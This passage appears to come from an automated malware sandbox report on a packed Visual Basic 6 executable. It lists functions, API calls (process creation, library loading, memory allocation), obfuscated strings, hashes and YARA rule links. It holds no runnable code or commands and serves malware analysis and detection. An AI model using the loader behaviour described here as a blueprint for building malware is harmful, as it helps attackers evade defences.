__vbaStrMove.MSVBVM60 ref: 00409C23
__vbaStrCmp.MSVBVM60(00407B2C,00000000), ref: 00409C2F
__vbaFreeStr.MSVBVM60 ref: 00409C3D
__vbaFreeVar.MSVBVM60 ref: 00409C46
__vbaNew2.MSVBVM60(00407AF0,0040B338), ref: 00409C63
__vbaHresultCheckObj.MSVBVM60(00000000,?,00407AE0,00000014), ref: 00409C88
__vbaHresultCheckObj.MSVBVM60(00000000,?,00407B00,000000E8), ref: 00409CB2
__vbaStrMove.MSVBVM60 ref: 00409CC1
__vbaFreeObj.MSVBVM60 ref: 00409CCA
__vbaFreeStr.MSVBVM60(00409D16), ref: 00409D0E
__vbaFreeStr.MSVBVM60 ref: 00409D13

Strings

TILBEREDNINGENS, xrefs: 00409BB1
BIPECTINATE, xrefs: 00409BC6
, xrefs: 00409C0A
Prenticing7, xrefs: 00409BC1

Memory Dump Source

Source File: 00000001.00000001.233837521.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.233845027.000000000040C000.00000040.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckHresult$#520#606#689CopyListNew2
String ID: $BIPECTINATE$Prenticing7$TILBEREDNINGENS
API String ID: 2559154175-1360724029
Opcode ID: e35b3ec6b9d95e617ea3419636d11ba119f0d2eec6e992f41253af0583d203a7
Instruction ID: fa28e024705b97c53fbc941d9b0c3285d9d71337e80835e51b5dbce7527a7474
Opcode Fuzzy Hash: e35b3ec6b9d95e617ea3419636d11ba119f0d2eec6e992f41253af0583d203a7
Instruction Fuzzy Hash: 84514171D042189FDB04DFA4DE45AEEBBB8FF48700F20412AE506B72A0D7786945CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004091F0, Relevance: 45.7, APIs: 22, Strings: 4, Instructions: 151COMMON

Download Yara Rule

APIs

__vbaStrCat.MSVBVM60(00407B2C,00407B24), ref: 00409246
__vbaStrMove.MSVBVM60 ref: 00409257
#523.MSVBVM60(?), ref: 0040925D
__vbaStrMove.MSVBVM60 ref: 00409268
__vbaStrCmp.MSVBVM60(00407B24,00000000), ref: 00409270
__vbaFreeStr.MSVBVM60 ref: 00409282
#689.MSVBVM60(Vandstande3,Tjekkens8,KNIGHTHEAD), ref: 004092C0
__vbaStrMove.MSVBVM60 ref: 004092CB
__vbaStrCmp.MSVBVM60(00000000,00000000), ref: 004092CF
__vbaFreeStr.MSVBVM60 ref: 004092E1
#606.MSVBVM60(00000001,?), ref: 00409304
__vbaStrMove.MSVBVM60 ref: 0040930F
__vbaStrCmp.MSVBVM60(00407B2C,00000000), ref: 00409317
__vbaFreeStr.MSVBVM60 ref: 00409329
__vbaFreeVar.MSVBVM60 ref: 00409332
__vbaNew2.MSVBVM60(00407AF0,0040B338), ref: 0040934F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00407AE0,00000014), ref: 00409374
__vbaHresultCheckObj.MSVBVM60(00000000,?,00407B00,000000E8), ref: 0040939E
__vbaStrMove.MSVBVM60 ref: 004093AD
__vbaFreeObj.MSVBVM60 ref: 004093B2
__vbaFreeStr.MSVBVM60(004093EC), ref: 004093E4
__vbaFreeStr.MSVBVM60 ref: 004093E9

Strings

, xrefs: 004092F6
Tjekkens8, xrefs: 004092B3
KNIGHTHEAD, xrefs: 004092A3
Vandstande3, xrefs: 004092B8

Memory Dump Source

Source File: 00000001.00000001.233837521.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.233845027.000000000040C000.00000040.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckHresult$#523#606#689New2
String ID: $KNIGHTHEAD$Tjekkens8$Vandstande3
API String ID: 1235917762-191539215
Opcode ID: b790c0954e9f8eb1d30e1efadfa9ba33f8819103b0847614aa3369360a218e17
Instruction ID: cf517ee91ec9418fa9675a6d1c13cf0288b97cf8a001e67d7d87b43058a1b61c
Opcode Fuzzy Hash: b790c0954e9f8eb1d30e1efadfa9ba33f8819103b0847614aa3369360a218e17
Instruction Fuzzy Hash: C2514F71D002149FCB04DFA4DD89AEEBBB4EF58714F204166E902B72A0DB786D45CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0234163D, Relevance: 1.6, APIs: 1, Instructions: 146libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0234223D: LoadLibraryA.KERNELBASE(?,8802EDAC,?,023425BF,0234010D,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,000000FF,00000000), ref: 02342287

LdrInitializeThunk.NTDLL(?,02341585,?,02340229,?,?,?,?,?,?,?,023400B8), ref: 02341B51

Memory Dump Source

Source File: 00000001.00000002.273434874.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID: InitializeLibraryLoadThunk
String ID:
API String ID: 3353482560-0
Opcode ID: 3f37fff17c92ded46075cbb19c3161db17dd2f0e8848fc1ddd81dffdadaadefe
Instruction ID: 5002593357f31e96d75827806a1fdf9e06b93441794101fd23e18e99196951cc
Opcode Fuzzy Hash: 3f37fff17c92ded46075cbb19c3161db17dd2f0e8848fc1ddd81dffdadaadefe
Instruction Fuzzy Hash: 1241F3315193C98FC7329BB08998AE77FA5BF02210F4885CEC4C95A553DB20A646DBA7

Uniqueness

Uniqueness Score: -1.00%

Function 02342D96, Relevance: 1.6, APIs: 1, Instructions: 102processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(00000004,?,?,?,?,?,?,?,023400B8), ref: 02342EA9

Memory Dump Source

Source File: 00000001.00000002.273434874.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: a39a79eb3f261660a750cf996337261c621dab1d22d22911841de832a8d8e140
Instruction ID: 8021d81e79e64717e4fa65d74c9924ca09d799dc5144ad6179cb4920c253d60a
Opcode Fuzzy Hash: a39a79eb3f261660a750cf996337261c621dab1d22d22911841de832a8d8e140
Instruction Fuzzy Hash: 642136312005058EEB288EA0C94C7EBB3EBFF41725F8855D5F915A76A0DB34E6C4CA72

Uniqueness

Uniqueness Score: -1.00%

Function 02342DCC, Relevance: 1.6, APIs: 1, Instructions: 95processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(00000004,?,?,?,?,?,?,?,023400B8), ref: 02342EA9

Memory Dump Source

Source File: 00000001.00000002.273434874.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 7bf46969b8a6b70c514e7d88a4a4fb63fe307d809ce4848aad02c6157b401271
Instruction ID: ae1aeaf865a41dc23c453586a4856eeb31b142fc02e3008267bb479ce5d25ec8
Opcode Fuzzy Hash: 7bf46969b8a6b70c514e7d88a4a4fb63fe307d809ce4848aad02c6157b401271
Instruction Fuzzy Hash: AE214C312005058EEB388EA0C90C7E773EAFF01729F8855D5F905A76A0DB34E6C4CA71

Uniqueness

Uniqueness Score: -1.00%

Function 02342D90, Relevance: 1.6, APIs: 1, Instructions: 89processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(00000004,?,?,?,?,?,?,?,023400B8), ref: 02342EA9

Memory Dump Source

Source File: 00000001.00000002.273434874.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 4d05b07046e70acbeed7cc056f218c512d9433545e81308c485bae33229354ca
Instruction ID: e1bd90649834f3e198a125d4a788d24fee95703ed72259d933ffed75c97d684c
Opcode Fuzzy Hash: 4d05b07046e70acbeed7cc056f218c512d9433545e81308c485bae33229354ca
Instruction Fuzzy Hash: D42149306006058EEB299E35C8587A676E3FB42B15F5552E9F914AB2E0CB38A4C4CA50

Uniqueness

Uniqueness Score: -1.00%

Function 02340417, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 02341378

Memory Dump Source

Source File: 00000001.00000002.273434874.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 41f3e18426aaadf66981b6c364312dab5f45172fbfd9d7f8f0ec429663c5b6a1
Instruction ID: fd717079adb813ed837f520d746483ea02997dc769d56695dd118a80e3423682
Opcode Fuzzy Hash: 41f3e18426aaadf66981b6c364312dab5f45172fbfd9d7f8f0ec429663c5b6a1
Instruction Fuzzy Hash: 9301DB229096C16EE7174A28CC597AA6AA67FD3714F2A82CCE08953281C76C71528661

Uniqueness

Uniqueness Score: -1.00%

Function 0234223D, Relevance: 1.5, APIs: 1, Instructions: 34libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,8802EDAC,?,023425BF,0234010D,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,000000FF,00000000), ref: 02342287

Memory Dump Source

Source File: 00000001.00000002.273434874.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: cba27fee041e177c611f4c13a443a60e4efe13f00e3cf0863aeea202bf88511e
Instruction ID: c3ec31eb85b6f8a71a60fc2c2ba0ac06eb806a8feeef5a2ed41695fc8e0f900d
Opcode Fuzzy Hash: cba27fee041e177c611f4c13a443a60e4efe13f00e3cf0863aeea202bf88511e
Instruction Fuzzy Hash: DDE04FC0AA514929DEB83F215C84BBF2AE7DB5A761F50BED0FC54B62108F24A4444D56

Uniqueness

Uniqueness Score: -1.00%

Function 023402FC, Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 02341378

Memory Dump Source

Source File: 00000001.00000002.273434874.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: d2867f36b6e1f999b579ad6c7ef7a1207cf65c4e27b4584d8af5ed4c4ed1ef4f
Instruction ID: 39dc89598e3e4d551af6f96fbdffed359081ecd1e101c7c20a275259ec4b5a35
Opcode Fuzzy Hash: d2867f36b6e1f999b579ad6c7ef7a1207cf65c4e27b4584d8af5ed4c4ed1ef4f
Instruction Fuzzy Hash: BBE0622B21C14561C7A080C0DF0EBEB73AC6B41268FC45581A9BF90E82BE00E3846573

Uniqueness

Uniqueness Score: -1.00%

Function 0234134A, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 02341378

Memory Dump Source

Source File: 00000001.00000002.273434874.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 586d6af3ded7390fc3d6a6fa34c165730c75aba4bcd2c63d32bdf28e0048053e
Instruction ID: c014b617317f0729aa657a753c143f10e75e8c03852ad1a9a77137fae14f97b4
Opcode Fuzzy Hash: 586d6af3ded7390fc3d6a6fa34c165730c75aba4bcd2c63d32bdf28e0048053e
Instruction Fuzzy Hash: 6AD09E2B21810921C7B080C0DF0EBDB73AC6B41378FC80581AA7F90E82BE00A3482973

Uniqueness

Uniqueness Score: -1.00%

Function 02341562, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(02340229,80000000,00000001,00000000,00000003,00000000,00000000,0234153F,02341589,02340229), ref: 0234157B

Memory Dump Source

Source File: 00000001.00000002.273434874.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7cce4cc99eda0915bc009925dd7bb4b16bc6e30f364a1a713d30ee3bafaf2e3b
Instruction ID: d717f65ad30c15f52abe3db3f63261360ce047bed68822192e92e541db7257d9
Opcode Fuzzy Hash: 7cce4cc99eda0915bc009925dd7bb4b16bc6e30f364a1a713d30ee3bafaf2e3b
Instruction Fuzzy Hash: 8FC04CB27D4301BAF63586148D16FC67116ABD0F04F108508B7092E1C047F16610C526

Uniqueness

Uniqueness Score: -1.00%

Function 0040209A, Relevance: 1.3, APIs: 1, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00008000,00008000,-0000226A,00000011), ref: 004020BC

Memory Dump Source

Source File: 00000001.00000001.233837521.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.233845027.000000000040C000.00000040.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0a6d8f94fd2707487a9d197c1044857d3b58c30cf81941a524bffa29ee0cd89c
Instruction ID: ee09dc43e85f75c573411aa1a845eb5a6102984d820b813155459aa3a82d301e
Opcode Fuzzy Hash: 0a6d8f94fd2707487a9d197c1044857d3b58c30cf81941a524bffa29ee0cd89c
Instruction Fuzzy Hash: 6F11B1B1A0E356DFE7A58A108B9C636B1A5B664321B70807B87033D1C4E5FD4483F61F

Uniqueness

Uniqueness Score: -1.00%

Function 004020B2, Relevance: 1.3, APIs: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00008000,00008000,-0000226A,00000011), ref: 004020BC

Memory Dump Source

Source File: 00000001.00000001.233837521.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.233845027.000000000040C000.00000040.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e1668814fe94899a060a9227e4d00f495382182f0d1c500bc80aa1a281120f5b
Instruction ID: 164400655fd0b5616554e1ba1b302ac6ccc84451c0e3765f76b5cacf4841bb38
Opcode Fuzzy Hash: e1668814fe94899a060a9227e4d00f495382182f0d1c500bc80aa1a281120f5b
Instruction Fuzzy Hash: A6F03AB075E396CAE6664A008B9C636A125B694311B31C03797073E5C0D9FE0493F62F

Uniqueness

Uniqueness Score: -1.00%

Function 004020B5, Relevance: 1.3, APIs: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00008000,00008000,-0000226A,00000011), ref: 004020BC

Memory Dump Source

Source File: 00000001.00000001.233837521.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.233845027.000000000040C000.00000040.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1abfe508e612e81e7e0ba7d4df0462e7fad1bac476bc4cf30075c52205996f41
Instruction ID: 6e5f42a1dcff577e766a5f0ce65a46ae9e8f2e88168a2c1e1cdfd99e2b8d884b
Opcode Fuzzy Hash: 1abfe508e612e81e7e0ba7d4df0462e7fad1bac476bc4cf30075c52205996f41
Instruction Fuzzy Hash: 30F067B0A1E396CAD6A50A008B9D636B221B790310B31803B9B073E6C0D9FD0483F21F

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 023408EF, Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.273434874.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 636b809d75d921454b2aaa74b3431961707a2b6cd5eaea5142846b14b57e5987
Instruction ID: 746c2da91736a6b3edc21aa00665953b208b6f0992b5b611fe4150862edc7336
Opcode Fuzzy Hash: 636b809d75d921454b2aaa74b3431961707a2b6cd5eaea5142846b14b57e5987
Instruction Fuzzy Hash: FCA16C71700601ABD368DF28CCC5FE6B3E5FF06714F159269E968A3341CB78B8658B94

Uniqueness

Uniqueness Score: -1.00%

Function 0234275C, Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.273434874.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: 81af6fb7d0ca9584749d2ba7974cf21b1c27cf63a89d29fe51fac9eecff665bc
Instruction ID: cd08f1c520d38a3c1b07eddc2cf35b9c669b8b05b2c186cac6b6d551527fa577
Opcode Fuzzy Hash: 81af6fb7d0ca9584749d2ba7974cf21b1c27cf63a89d29fe51fac9eecff665bc
Instruction Fuzzy Hash: C37192709043818FDB25CF38C4C4B2ABBE1EF52320F0492D9E9A59B2E7CB749542C726

Uniqueness

Uniqueness Score: -1.00%

Function 02340CEF, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.273434874.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54b1dcd5ac90eda7a43dab3913e3fe2ee12db5640c263b467fc3ca0c25096c73
Instruction ID: 54e6c12a5d28bb44894583d613da6d1878a97a51df4f41106b434bdc00ec0bbd
Opcode Fuzzy Hash: 54b1dcd5ac90eda7a43dab3913e3fe2ee12db5640c263b467fc3ca0c25096c73
Instruction Fuzzy Hash: D7317A702547419FE7399F24CC88F9A77E5FF02718F1186C4F9585B1E2CBB4AA84CA11

Uniqueness

Uniqueness Score: -1.00%

Function 02340BC1, Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.273434874.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e8999b32b431ab8690dcf421e9e2ac033b54d34d2ed5296055bdaf03a51c024
Instruction ID: c2ccfaf0afaf04c301c65d43d507e4695738d4c6ece90e139290aec4606d9e14
Opcode Fuzzy Hash: 6e8999b32b431ab8690dcf421e9e2ac033b54d34d2ed5296055bdaf03a51c024
Instruction Fuzzy Hash: 79218E717102419BD76CDE28CC85FA6B3E8FB06710F1596A5F868A7381CF24F9598B90

Uniqueness

Uniqueness Score: -1.00%

Function 02342445, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.273434874.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ad006374e93f0577c5f44708df924f0974be47ea43e875f78f76b683607fe3b
Instruction ID: 081216d047aadd8714e6ca06e8ab32d18edf31ff3d2d3ac3c3a98fc26bb140e8
Opcode Fuzzy Hash: 0ad006374e93f0577c5f44708df924f0974be47ea43e875f78f76b683607fe3b
Instruction Fuzzy Hash: 69E01A753152008FC314CB24C5C4E1BB3F5EB59B10F8244D4F905AB766CA38FC80CA14

Uniqueness

Uniqueness Score: -1.00%

Function 02342507, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.273434874.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ff9f81056d5660a30e2abdb0c438c3ba6f77c82e6867f3bf49b3f4652ad147f
Instruction ID: 1d57b628af580519598d3a816c8fed5f96e4798e17f059404ef9e54324596a95
Opcode Fuzzy Hash: 4ff9f81056d5660a30e2abdb0c438c3ba6f77c82e6867f3bf49b3f4652ad147f
Instruction Fuzzy Hash: 70D0A761A0002009F72105758620369A8C3C3C5240FD4F2E46B20925489878578242F4

Uniqueness

Uniqueness Score: -1.00%

Function 02341385, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.273434874.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ba0b9f6ee8287a056ae9d3192cd1a4dbc1d47db8242e3ccb85db14a6e1add3b
Instruction ID: d8a22c7a59d4f64c27d1a6f535ab51a8b87cf9ba1a35f942a806b6aa6ec3f70f
Opcode Fuzzy Hash: 7ba0b9f6ee8287a056ae9d3192cd1a4dbc1d47db8242e3ccb85db14a6e1add3b
Instruction Fuzzy Hash: 16B002B66515C19FEF56DB08D591B4073A4FB55B48F0905D0E012DB612D264EA10CA14

Uniqueness

Uniqueness Score: -1.00%

Function 0234222C, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.273434874.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f988ab7f57d6c0e25c2e7a400bde4973b199462e7c019c49e16bcd92adafee1
Instruction ID: 9cc70ab7c6732d70df65c4131f2bf9ebf21bd9b4cebbecaad6240ec7f41d525e
Opcode Fuzzy Hash: 3f988ab7f57d6c0e25c2e7a400bde4973b199462e7c019c49e16bcd92adafee1
Instruction Fuzzy Hash: 0AB00131661AC0CFCF96CF19D2A0E41B3B4FB46F51F4269D0E0159BA22C3A8EA04CA14

Uniqueness

Uniqueness Score: -1.00%

Function 00408B90, Relevance: 56.2, APIs: 31, Strings: 1, Instructions: 192COMMON

Download Yara Rule

APIs

__vbaAryConstruct2.MSVBVM60(?,00407A70,00000008), ref: 00408BF3
__vbaStrCat.MSVBVM60(00407A2C,00407A20), ref: 00408C09
__vbaStrMove.MSVBVM60 ref: 00408C16
#712.MSVBVM60(?,00407A34,00000000,00000001,000000FF,00000000), ref: 00408C27
__vbaStrMove.MSVBVM60 ref: 00408C32
__vbaStrCat.MSVBVM60(00407A2C,00407A3C,?), ref: 00408C42
__vbaStrMove.MSVBVM60 ref: 00408C49
__vbaStrCmp.MSVBVM60(00000000), ref: 00408C4C
__vbaFreeStr.MSVBVM60 ref: 00408C5E
__vbaVarDup.MSVBVM60 ref: 00408C81
#558.MSVBVM60(?), ref: 00408C8B
__vbaFreeVar.MSVBVM60 ref: 00408CA1
__vbaStrCat.MSVBVM60(00407A58,00407A58,00000001), ref: 00408CBC
__vbaStrMove.MSVBVM60 ref: 00408CC7
#616.MSVBVM60(00000000), ref: 00408CCA
__vbaStrMove.MSVBVM60 ref: 00408CD5
__vbaStrCmp.MSVBVM60(00407A58,00000000), ref: 00408CDD
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408CF6
#714.MSVBVM60(?,?,00000000), ref: 00408D26
__vbaVarTstEq.MSVBVM60(?,?), ref: 00408D4B
__vbaFreeVarList.MSVBVM60(00000002,00000005,?), ref: 00408D5D
__vbaR8Str.MSVBVM60(00407A60), ref: 00408D74
__vbaFPFix.MSVBVM60 ref: 00408D7A
__vbaFpR8.MSVBVM60 ref: 00408D80
#708.MSVBVM60(00000005,00000008,00407A68,000000FF,00000000), ref: 00408DBC
__vbaAryVar.MSVBVM60(00002008,00000005), ref: 00408DCB
__vbaAryCopy.MSVBVM60(?,?), ref: 00408DE2
__vbaFreeVar.MSVBVM60 ref: 00408DEB
__vbaAryDestruct.MSVBVM60(00000000,?,00408E4D), ref: 00408E2E
__vbaFreeStr.MSVBVM60 ref: 00408E33
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 00408E4A

Strings

MEEKLY, xrefs: 00408C73

Memory Dump Source

Source File: 00000001.00000001.233837521.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.233845027.000000000040C000.00000040.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$DestructList$#558#616#708#712#714Construct2Copy
String ID: MEEKLY
API String ID: 4215732002-208227423
Opcode ID: 339fea03ec0b97a40189676b45fa60fa14f3aa26b0193be1560d97ccac459ae9
Instruction ID: 2135465e9af7155e7497ad1d02310fa8c5b56cc487998bfb9bf41a464d25c5ec
Opcode Fuzzy Hash: 339fea03ec0b97a40189676b45fa60fa14f3aa26b0193be1560d97ccac459ae9
Instruction Fuzzy Hash: F5714E71D00218ABCB14DFA5DE49EDEBBB8FF44700F10822AE556B72A0DB741A45CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00409F10, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 183COMMON

Download Yara Rule

APIs

__vbaAryConstruct2.MSVBVM60(?,00407A70,00000008), ref: 00409F73
#685.MSVBVM60 ref: 00409F79
__vbaObjSet.MSVBVM60(?,00000000), ref: 00409F84
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00407C78,0000001C), ref: 00409FA8
__vbaFreeObj.MSVBVM60 ref: 00409FC2
__vbaVarDup.MSVBVM60 ref: 00409FE5
#558.MSVBVM60(?), ref: 00409FEF
__vbaFreeVar.MSVBVM60 ref: 0040A00B
__vbaStrCat.MSVBVM60(00407A58,00407A58,00000001), ref: 0040A022
__vbaStrMove.MSVBVM60 ref: 0040A033
#616.MSVBVM60(00000000), ref: 0040A036
__vbaStrMove.MSVBVM60 ref: 0040A041
__vbaStrCmp.MSVBVM60(00407A58,00000000), ref: 0040A049
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040A062
#714.MSVBVM60(?,?,00000000), ref: 0040A092
__vbaVarTstEq.MSVBVM60(?,?), ref: 0040A0B7
__vbaFreeVarList.MSVBVM60(00000002,00000005,?), ref: 0040A0C9
__vbaR8Str.MSVBVM60(00407A60), ref: 0040A0DC
__vbaFPFix.MSVBVM60 ref: 0040A0E2
__vbaFpR8.MSVBVM60 ref: 0040A0E8
#708.MSVBVM60(00000005,00000008,00407A8C,000000FF,00000000), ref: 0040A124
__vbaAryVar.MSVBVM60(00002008,00000005), ref: 0040A133
__vbaAryCopy.MSVBVM60(?,?), ref: 0040A14A
__vbaFreeVar.MSVBVM60 ref: 0040A153
__vbaAryDestruct.MSVBVM60(00000000,?,0040A1B4), ref: 0040A1AA
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 0040A1B1

Strings

hovedrengringer, xrefs: 00409FD7

Memory Dump Source

Source File: 00000001.00000001.233837521.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.233845027.000000000040C000.00000040.00020000.sdmp Download File

Similarity

API ID: __vba$Free$DestructListMove$#558#616#685#708#714CheckConstruct2CopyHresult
String ID: hovedrengringer
API String ID: 253651287-1204868762
Opcode ID: 3f389274ab25895c72669a638a2815fd9bb2a7166844ee8298960646b8882080
Instruction ID: 4c74bbc6fa119cb8df9b7d025a4af9b65b87b8520e9fcc17792955186051634a
Opcode Fuzzy Hash: 3f389274ab25895c72669a638a2815fd9bb2a7166844ee8298960646b8882080
Instruction Fuzzy Hash: EC611C71C00218AFDB24DFA5DD48ADEBBB8FF48701F10826AE515B72A0DB741A49CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00409420, Relevance: 42.1, APIs: 28, Instructions: 138COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 0040947B
__vbaStrCopy.MSVBVM60 ref: 00409483
__vbaStrCat.MSVBVM60(00407B90,00407B84,00000002), ref: 00409491
__vbaStrMove.MSVBVM60 ref: 004094A2
__vbaInStrB.MSVBVM60(00000000,00407B90,00000000), ref: 004094AB
__vbaFreeStr.MSVBVM60 ref: 004094C0
#614.MSVBVM60(00000000,40220000), ref: 004094D5
__vbaFpR8.MSVBVM60 ref: 004094DB
__vbaStrCat.MSVBVM60(00407BA0,00407B98), ref: 00409502
__vbaStrMove.MSVBVM60 ref: 00409509
__vbaStrCat.MSVBVM60(00407BA8,00000000), ref: 00409511
__vbaStrMove.MSVBVM60 ref: 00409518
__vbaStrCat.MSVBVM60(00407B98,00000000), ref: 00409520
__vbaStrMove.MSVBVM60 ref: 00409527
__vbaStrCat.MSVBVM60(00407BA0,00000000), ref: 0040952F
__vbaStrMove.MSVBVM60 ref: 00409536
__vbaStrCat.MSVBVM60(00407BB0,00000000), ref: 0040953E
__vbaStrMove.MSVBVM60 ref: 00409545
__vbaStrCat.MSVBVM60(00407BA0,00000000), ref: 0040954D
__vbaStrMove.MSVBVM60 ref: 00409554
#541.MSVBVM60(?,00000000), ref: 0040955B
__vbaStrVarMove.MSVBVM60(?), ref: 00409565
__vbaStrMove.MSVBVM60 ref: 00409570
__vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,?,?), ref: 0040958C
__vbaFreeVar.MSVBVM60 ref: 00409598
__vbaFreeStr.MSVBVM60(004095E9), ref: 004095DC
__vbaFreeStr.MSVBVM60 ref: 004095E1
__vbaFreeStr.MSVBVM60 ref: 004095E6

Memory Dump Source

Source File: 00000001.00000001.233837521.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.233845027.000000000040C000.00000040.00020000.sdmp Download File

Similarity

API ID: __vba$Move$Free$Copy$#541#614List
String ID:
API String ID: 3409990201-0
Opcode ID: 131bdff5d0727e05d78014d6f8964ed445f9287f0687c88fd17df7c62588eb95
Instruction ID: 81d1fa23444182e068ce3fe51870a44de1e5d58035a3cb8ddb643997c84a53a5
Opcode Fuzzy Hash: 131bdff5d0727e05d78014d6f8964ed445f9287f0687c88fd17df7c62588eb95
Instruction Fuzzy Hash: 48410D71D00218ABDB05EFA5DD95DEEBBB8EF58704F10412BE502B31A0DA746D05CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00409770, Relevance: 34.6, APIs: 23, Instructions: 137COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 004097C5
#526.MSVBVM60(?,00000001), ref: 004097D1
